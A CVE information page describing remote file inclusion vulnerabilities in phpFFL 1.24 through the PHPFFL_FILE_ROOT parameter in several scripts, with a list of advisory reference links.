CVE-2007-4935 Information
Description
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) admin.php (2) custom_pages.php (3) draft.php (4) faq.php (5) leagues.php (6) livedraft.php (7) login.php (8) my_team.php (9) profile.php (10) signup.php (11) statistics.php (12) transactions.php (13) program_files/admin/custom_pages.php or (14) program_files/common.php. NOTE: the program_files/livedraft/admin.php and program_files/livedraft/livedraft.php vectors are covered by CVE-2007-4934.
Reference
http://arfis.wordpress.com/2007/09/14/rfi-02-phpffl-fantasy-football-league-manager/ http://osvdb.org/39650 http://osvdb.org/39651 http://osvdb.org/39652 http://osvdb.org/39653 http://osvdb.org/39654 http://osvdb.org/39655 http://osvdb.org/39656 http://osvdb.org/39657 http://osvdb.org/39658 http://osvdb.org/39659 http://osvdb.org/39660 http://secunia.com/advisories/26812 http://sourceforge.net/forum/forum.php?forum_id=735906 http://sourceforge.net/project/shownotes.php?release_id=539716&group_id=137531 http://www.vupen.com/english/advisories/2007/3176
Share on: